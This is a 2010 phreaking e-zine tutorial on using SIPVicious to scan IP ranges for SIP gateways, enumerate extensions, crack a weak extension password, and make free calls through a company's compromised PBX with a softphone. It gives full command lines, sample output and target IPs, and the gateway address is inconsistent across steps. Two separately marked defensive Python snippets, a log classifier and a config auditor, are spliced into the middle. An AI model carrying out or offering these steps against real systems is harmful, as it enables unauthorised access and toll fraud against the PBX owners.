[ 1998 - 2010 - Hacking, Phreaking & Anarchy in the UK ]

11th February 2010. Author: -=The Firestarter=-

----------------------------------------------------------
[ SIPVicious & making free calls via the net ]
----------------------------------------------------------

Well, I was hoping to run WarVOX to enable me to wardial a few numbers in the hope of locating some VMS to use and abuse for profit and fun. Somehow using Skype just didn't cut it, and using a normal modem & fone line was, well, too late-20th-century for my liking. So I fired up my trusty eeePC into "hack mode" and watched as BT4 loaded itself up. Now time to take over someone's VoIP gateway....

So what is SIPVicious? Essentially it's a collection of Python scripts that are used to find and audit (read: crack) SIP servers - VoIP gateways, basically.

The first script we will be using is the one that finds the gateways: svmap.py. To use this we will need an IP range. I've found that it's not 100% reliable if you scan 123.123.*.* at the default speed, as it seems to miss bits and pieces, but scanning just the last octet, i.e. 123.123.1.* and then 123.123.2.* etc., usually yields better results if you're sticking to the default scan speed. It doesn't take too long, however, with a spreadsheet to help create a shell script (or batch file if you're still using that shite OS known as doze) to automate that.

OK, SIP gateways usually use port 5060, but it can be wise to scan 5060-5062 just in case; scans don't take too long, so the extra ports won't extend your scanning time by very much at all.
Actually, I think because the scan is so fast it seems to miss things every now and then, but by adding the -t option you can alter the timing. Using -t0.1 seems to do the trick on most occasions, but will extend the scan time somewhat. Better we get accurate results than misses.

Right, so we have some ranges to scan, let's say 213.171.*.*. You can scan this range and all the required ports with this command line:

    ./svmap.py -t0.1 -p5060-5062 213.171.*.* >>./sipscans.txt

It will also save the scan results to a text file called sipscans.txt. The -t0.1 is somewhat optional; having it too high will add eons to the scan time. You could also try -t0.05; the default setting is 0.005. That said, however, I've found a hell of a lot more gateways by extending the time rather than going by the default timings. The -p flag, as you've guessed, is for the port; by default it will only scan port 5060, but I like more results, so I'm going for 5060, 5061 & 5062.

Fire away and go grab a bottle of Brew Dog ale (or two) while the scan sweeps through all of the addresses; it will take a good few minutes if, like me, you're at the bottom end of the broadband scale. Once completed, check out the resulting text file. It should be full of entries and look somewhat like:

    | SIP Device       | User Agent                         | Fingerprint               |
    ------------------------------------------------------------------------------------
    | 91.84.16.59:5060 | NCH Software Axon Virtual PBX 2.01 | NCH Swift Sound Axon 1.20 |

OK, so we know which IP it's on and which port, and also what software is running on it. Some seem to be set up more correctly than others, if you follow me.

The next step is going to involve locating all of the extensions that are attached to this SIP device. For this we use the script svwar.py. This little beauty locates working extensions on the line, as well as letting us know whether or not they need authentication to work.
The command on a basic level:

    ./svwar.py -p5060 91.84.16.59

Worth noting that since it's on the default port you don't really have to specify it, as svwar.py defaults to port 5060.

By default this will scan for extensions 100-999. You might wish to scan for other extensions; you can specify this with the -e flag, i.e. -e1-9999 will scan for extensions 1 all the way up to 9999. But what if the extension is 0001? For this you add the flag -z, which indicates how many zeros are padded into the number, so for a 4-digit extension scan you pad it with -z4. So if you wished to scan for 4-digit extensions, say if your first scan with svwar failed, you would use the command:

    ./svwar.py -p5060 -e1-9999 -z4 91.84.16.59

This would then almost certainly yield lots of results. Anyhow, once you have run svwar on the target you will hopefully see something like this:

    | Extension | Authentication |
    ------------------------------
    | 108       | reqauth        |
    | 102       | reqauth        |
    | 103       | reqauth        |
    | 101       | reqauth        |
    | 106       | reqauth        |
    | 107       | reqauth        |
    | 104       | reqauth        |
    | 105       | reqauth        |

Now it's time to crack that authentication to gain access to the extension. For this test we will use svcrack.py:

    ./svcrack.py -u 101 -t0.1 91.84.16.59

The -u 101 flag is the user, or extension, so if you wanted to 0wn extension 108 you'd use -u 108. Again the -t0.1 flag is there to slow things down; so much gets missed going at default speeds.

It is possible to run a dictionary attack against the extension if the usual numeric methods fail. To use a dictionary in the attack, use the -d flag to specify it, followed by the file name, i.e.:

    ./svcrack.py -u 101 -t0.1 -d dictionary.txt 213.171.43.205

Also worth noting that by default the cracker will only try 3-digit numbers against the extension. To increase or change this range use the -r flag, and the -z option for padding zeros might be a good idea as well.
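The svwar and svcrack runs above leave a distinctive trail on the gateway side: one source failing REGISTER against lots of different extensions, then hammering a single extension with wrong passwords. Below is an added example (not part of SIPVicious or of this article) that picks both patterns out of Asterisk chan_sip-style "Registration failed" log lines; the sample lines are constructed for the demo and the thresholds are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample lines in Asterisk chan_sip "Registration failed" style
# (wording assumed for this demo; adapt LINE_RE to your own PBX log).
SAMPLE_LOG = """\
[Feb 11 21:02:10] NOTICE: Registration from '<sip:100@pbx>' failed for '203.0.113.7:5060' - No matching peer found
[Feb 11 21:02:10] NOTICE: Registration from '<sip:101@pbx>' failed for '203.0.113.7:5060' - Wrong password
[Feb 11 21:02:11] NOTICE: Registration from '<sip:102@pbx>' failed for '203.0.113.7:5060' - Wrong password
[Feb 11 21:02:11] NOTICE: Registration from '<sip:103@pbx>' failed for '203.0.113.7:5060' - Wrong password
[Feb 11 21:02:12] NOTICE: Registration from '<sip:104@pbx>' failed for '203.0.113.7:5060' - No matching peer found
[Feb 11 21:05:01] NOTICE: Registration from '<sip:101@pbx>' failed for '203.0.113.9:5060' - Wrong password
[Feb 11 21:05:01] NOTICE: Registration from '<sip:101@pbx>' failed for '203.0.113.9:5060' - Wrong password
[Feb 11 21:05:02] NOTICE: Registration from '<sip:101@pbx>' failed for '203.0.113.9:5060' - Wrong password
[Feb 11 21:05:02] NOTICE: Registration from '<sip:101@pbx>' failed for '203.0.113.9:5060' - Wrong password
[Feb 11 21:09:40] NOTICE: Registration from '<sip:108@pbx>' failed for '198.51.100.5:5060' - Wrong password
"""

LINE_RE = re.compile(
    r"Registration from '<sip:(?P<ext>[^@>]+)@[^>]*>' failed for "
    r"'(?P<src>[\d.]+):\d+'"
)

def parse_failures(log_text):
    """Yield (source_ip, extension) for every failed REGISTER line."""
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if m:
            yield m.group("src"), m.group("ext")

def classify(log_text, enum_threshold=5, guess_threshold=4):
    """Return {source_ip: labels}. 'enumeration' = one source failing against
    many different extensions (svwar pattern); 'password_guessing' = one
    source failing repeatedly on the same extension (svcrack pattern).
    Thresholds are assumptions; tune them to your call volume."""
    exts_per_src = defaultdict(set)
    fails_per_src_ext = defaultdict(int)
    for src, ext in parse_failures(log_text):
        exts_per_src[src].add(ext)
        fails_per_src_ext[(src, ext)] += 1
    verdicts = defaultdict(set)
    for src, exts in exts_per_src.items():
        if len(exts) >= enum_threshold:
            verdicts[src].add("enumeration")
    for (src, ext), n in fails_per_src_ext.items():
        if n >= guess_threshold:
            verdicts[src].add("password_guessing")
    return dict(verdicts)
```

Running classify(SAMPLE_LOG) flags 203.0.113.7 as enumeration and 203.0.113.9 as password guessing, while the single typo from 198.51.100.5 stays quiet; the same counters drive a fail2ban-style block rule.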
I.e. we might run:

    ./svcrack.py -u 101 -r1-9999 -z4 -t0.1 91.84.16.59

Anyhow, we just so happen to run svcrack.py with its default options and get...

    | Extension | Password |
    ------------------------
    | 101       | 101      |

Bing0wned! That was hard now, wasn't it. Muhahaha.

***Worth noting, sometimes it matters whereabouts the -z and -t flags are in the command, so if using them and it fails, try moving them!!***

But all's not over yet; time to test the little beauty. For this we will need a softphone. My personal choice was X-Lite, as Ekiga, which I've messed with in the past, is in my opinion not too great.

OK, so what information do we have?

    username: 101
    password: 101
    SIP server: 96.84.16.59

In X-Lite -> System Settings -> SIP Proxy -> Default, set the fields to something like this:

    Enabled = Yes
    Display Name = k-rad h4xx0r
    Username = 101 (extension you found)
    Authorization user = 101 (extension you found)
    Password = 101 (or whatever you find)
    Domain/Realm = 96.84.16.59 (IP of gateway)
    SIP Proxy = 96.84.16.59 (IP of gateway)
    Out Bound Proxy = 96.84.16.59 (IP of gateway)

Input all of that information into the relevant settings. If you need to fill in a STUN server, use something like stunserver.org; it's free and works pretty well, although a lot of softphones have their own server details, i.e. X-Lite uses xten.net. I like to load them in as primary and secondary servers.

OK, all that information filled in? Fire up the account and see if it registers you. Time to make some calls! One technique we like to use is an unregistered pre-paid mobile, which we can pick up for next to nothing from more or less anywhere. Simply try giving it a call. Remember, if you've 0wned some system in another country, remember to use the country dialling code. Also try dialling 9 or some such thing for an outside line if you're having problems.

Call gone through? Congratulations, you've just phreaked some company's PBX system!
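The 101/101 result above is a configuration problem on the gateway, not a clever crack. Here is an added example (not from this article or any PBX vendor) that audits a constructed sip.conf-style peer list for exactly that class of weakness, and also checks the Asterisk alwaysauthreject setting, which decides whether unknown extensions answer differently from known ones (the difference svwar's reqauth column relies on); the min_len threshold and the sample peers are assumptions.

```python
import configparser

# Constructed sip.conf-style peers (Asterisk chan_sip format); values are
# made up for this demo. Peer 101 is the account the article finds:
# its secret is the extension number itself.
SAMPLE_SIP_CONF = """\
[general]
alwaysauthreject=no

[101]
type=friend
secret=101
host=dynamic

[108]
type=friend
secret=2f6Qx9LmWb4kTz
host=dynamic
"""

def audit_sip_conf(conf_text, min_len=12):
    """Return {section: [problems]}. Flags secrets that equal the extension,
    are numeric only, or are shorter than min_len, plus alwaysauthreject=no,
    which lets unknown and known extensions be told apart by the reply."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(conf_text)
    findings = {}
    if cp.get("general", "alwaysauthreject", fallback="no").lower() != "yes":
        findings["general"] = ["alwaysauthreject is not yes"]
    for peer in cp.sections():
        if not cp.has_option(peer, "type"):
            continue  # [general] and other non-peer sections
        secret = cp.get(peer, "secret", fallback="")
        problems = []
        if secret == peer:
            problems.append("secret equals extension")
        if secret.isdigit():
            problems.append("numeric only, trivially guessable")
        if len(secret) < min_len:
            problems.append("shorter than %d characters" % min_len)
        if problems:
            findings[peer] = problems
    return findings

if __name__ == "__main__":
    for section, problems in sorted(audit_sip_conf(SAMPLE_SIP_CONF).items()):
        print(section, "->", "; ".join(problems))
```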